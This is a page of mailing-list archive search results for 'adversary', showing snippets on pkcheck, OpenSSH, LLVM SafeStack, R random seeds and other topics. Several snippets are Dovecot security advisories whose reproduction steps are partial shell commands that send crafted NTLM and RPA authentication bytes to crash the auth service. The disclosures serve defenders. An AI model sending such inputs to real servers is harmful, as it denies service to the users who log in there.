Displaying 20 results from an estimated 87 matches for "adversary".
2017 Feb 09
4
Serious attack vector on pkcheck ignored by Red Hat
On Thu, 2017-02-02 at 13:40 -0800, Gordon Messmer wrote:
> Escalation *requires* attacking a program in a security context other
> than your own.
Not necessarily. Suppose the adversary is aware of a root
exploit/privilege escalation in a random library. Then the heap spraying
allows this attacker to easily trigger this exploit because he is able
to initialize the entire contents of the heap to his liking and thus
call whatever function he likes, including the one that will cause...
2010 Jul 25
1
Per E-Mail senden: commit.txt
...t; (using Freetz http://trac.freetz.org/).
The file is called ifaddr-compat.h/c and wraps the function "getifaddrs".
I'm going to answer your questions now:
> Why the need for a response message?
Because a simple "announce/broadcast" can't be authenticated, thus, an
adversary could announce that he's a legitimate endpoint.
Although this would not allow the adversary to decrypt packets,
communication between nodes could be interrupted.
By requesting the nodes to answer by encrypting the challenge, a safe
authentication can be achieved.
Since the challenge is random,...
2010 Oct 12
1
SELinux policy for dkim-milter
...have a sample SELinux policy for dkim-milter?
I'm using the configuration from this page:
http://www.howtoforge.com/set-up-dkim-for-multiple-domains-on-postfix-with-dkim-milter-2.8.x-centos-5.3
Along with the latest RPM from the link on that page.
Regards,
Ben
--
Ben McGinnes http://www.adversary.org/ Twitter: benmcginnes
Systems Administrator, Writer, ICT Consultant
Encrypted email preferred - primary OpenPGP/GPG key: 0xA04AE313
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x371AC5BFA04AE313
-------------- next part --------------
A non-text attachment was scrubbed...
Name:...
2010 Nov 08
5
large numbers of linux system user for postfix
hello,
i need to setup a mail server with postfix + dovecot + webmin +
virtualmin + virtual user with linux system user. the virtual user may
reach to thousands user from several hundreds virtual domains.
what i concern is large numbers of linux system user which used in
these setup, is it good or bad?
maybe somebody would share their experience about this setup ?
any links would be good.
2019 Feb 20
4
[Bug 2971] New: Prevent OpenSSH from advertising its version number
On 02/20/2019 07:51 AM, Mark D. Baushke wrote:
> There are too just many cases where both OpenSSH interoperating with
> itself as well as other SSH implementations have needed this version
> number to properly deal with bugs in the code via negitations.
FWIW, and without dismissing the possibility of fingerprinting a server
in other ways, the fact that clients that *can* pass
2017 Nov 03
2
Extreme bunching of random values from runif with Mersenne-Twister seed
Bill,
I have clarified this on SO, and I will copy that clarification in here:
"Sure, we tested them on other 8-digit numbers as well & we could not
replicate. However, these are honest-to-goodness numbers generated by a
non-adversarial system that has no conception of these numbers being used
for anything other than a unique key for an entity -- these are not a
specially constructed
2017 Feb 09
4
Serious attack vector on pkcheck ignored by Red Hat
...> exploit. Short of something insane like exposing pkcheck via CGI over
> HTTP, I don?t see how a flaw in pkcheck gives you something here that
> you don?t already have.
On many systems local users cannot execute their own uploaded binaries
(noexec mounts). This would also be true for an adversary entering a
system with a remote "unprivileged" exploit. In that situation pcheck
gives them a "crow bar" they did not have before.
> A vulnerable library is a vulnerable library. Fix the library, don?t
> invent reasons to fix all the other programs on the system because...
2017 Nov 03
2
Extreme bunching of random values from runif with Mersenne-Twister seed
Bill,
Appreciate the point that both you and Serguei are making, but the sequence
in question is not a selected or filtered set. These are values as observed
in a sequence from a mechanism described below. The probabilities required
to generate this exact sequence in the wild seem staggering to me.
T
On Fri, Nov 3, 2017 at 11:27 PM, William Dunlap <wdunlap at tibco.com> wrote:
>
2020 Apr 08
2
Questions about vscale
On Wed, 8 Apr 2020 at 04:23, Kai Wang <kai.wang at sifive.com> wrote:
> If we apply the type system pointed out by Renato, is the vector type <vscale x 1 x i16> legal? If we decide that <vscale x 1 x i16> is a fundamentally impossible type, does it contrary to the philosophy of LLVM IR as reasonably target-independent IR? I do not get the point of your argument.
Hi Kai,
2017 Nov 03
0
Extreme bunching of random values from runif with Mersenne-Twister seed
Another other generator is subject to the same problem with the same
probabilitiy.
> Filter(function(s){set.seed(s,
kind="Knuth-TAOCP-2002");runif(1,17,26)>25.99}, 1:10000)
[1] 280 415 826 1372 2224 2544 3270 3594 3809 4116 4236 5018 5692 7043
7212 7364 7747 9256 9491 9568 9886
Bill Dunlap
TIBCO Software
wdunlap tibco.com
On Fri, Nov 3, 2017 at 10:31 AM, Tirthankar
2019 Nov 22
2
Random nop insertion pass
> On Nov 21, 2019, at 14:23, Robinson, Paul via llvm-dev <llvm-dev at lists.llvm.org> wrote:
>
> Some years ago there was a random-nop-insertion pass (for ROP gadget removal) proposed, which didn't stick; we recently had a summer intern work on it but did not get to proper quality; I'd like to revive that.
Hi Paul,
I'm curious about what the use case for this was. In
2017 Feb 08
4
[RFC] Using Intel MPX to harden SafeStack
...tial BND0 upper bound when the program starts that is arbitrarily set to be 256MiB below the base of the initial (safe) stack. If and when that 256MiB space becomes overfilled by safe stacks, the program will crash due to a failing CHECK_GE statement in the runtime library. Without this check, an adversary may be able to modify a variable in the runtime library recording the address of the most-recently allocated safe stack to cause safe stacks to be allocated in vulnerable locations. An alternative approach to avoid that limitation could be to store that variable above the bound checked by the inst...
2017 Nov 05
0
Extreme bunching of random values from runif with Mersenne-Twister seed
Tirthankar,
"random number generators" do not produce random numbers. Any given
generator produces a fixed sequence of numbers that appear to meet
various tests of randomness. By picking a seed you enter that sequence
in a particular place and subsequent numbers in the sequence appear to
be unrelated. There are no guarantees that if YOU pick a SET of seeds
they won't produce
2012 Feb 14
4
How to escape exec command parameters?
If I have a "simple" variable value, this works fine:
capmon@peter:~> puppet -e ''$v="xyz" exec { f: command => "/bin/echo v
is $v", logoutput => true }''
notice: /Stage[main]//Exec[f]/returns: v is xyz
notice: /Stage[main]//Exec[f]/returns: executed successfully
But how do I escape "bad" values of $v? Painful examples like the
2017 Apr 07
2
[Bug 2706] New: remote code execution via ProxyCommand+browser exploit
https://bugzilla.mindrot.org/show_bug.cgi?id=2706
Bug ID: 2706
Summary: remote code execution via ProxyCommand+browser exploit
Product: Portable OpenSSH
Version: 7.4p1
Hardware: All
OS: Mac OS X
Status: NEW
Severity: security
Priority: P5
Component: ssh
Assignee:
2020 Aug 12
0
CVE-2020-12673: Specially crafted NTML package can crash auth service
...le
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past allocation which can lead to crash.
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne
'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
| \
base64 -w0 ;echo ;echo -ne
'NTLMSSP\x00\x03\x00\x00\x...
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's RPA mechanism implementation accepts zero-length message,
which leads to assert-crash later on
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01'
| base64 -w 0; echo ; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\...
2017 Feb 09
0
Serious attack vector on pkcheck ignored by Red Hat
...9, 2017, at 2:03 PM, Leonard den Ottolander <leonard at den.ottolander.nl> wrote:
>
> On Thu, 2017-02-02 at 13:40 -0800, Gordon Messmer wrote:
>> Escalation *requires* attacking a program in a security context other
>> than your own.
>
> Not necessarily. Suppose the adversary is aware of a root
> exploit/privilege escalation in a random library.
There are two serious problems with this argument:
1. Give me a scenario where this attacker can execute *only* pkcheck in order to exploit this hypothetical library?s flaw, but where the attacker cannot simply provide the...
2020 Aug 12
0
CVE-2020-12673: Specially crafted NTML package can crash auth service
...le
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past allocation which can lead to crash.
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne
'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
| \
base64 -w0 ;echo ;echo -ne
'NTLMSSP\x00\x03\x00\x00\x...
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's RPA mechanism implementation accepts zero-length message,
which leads to assert-crash later on
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01'
| base64 -w 0; echo ; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\...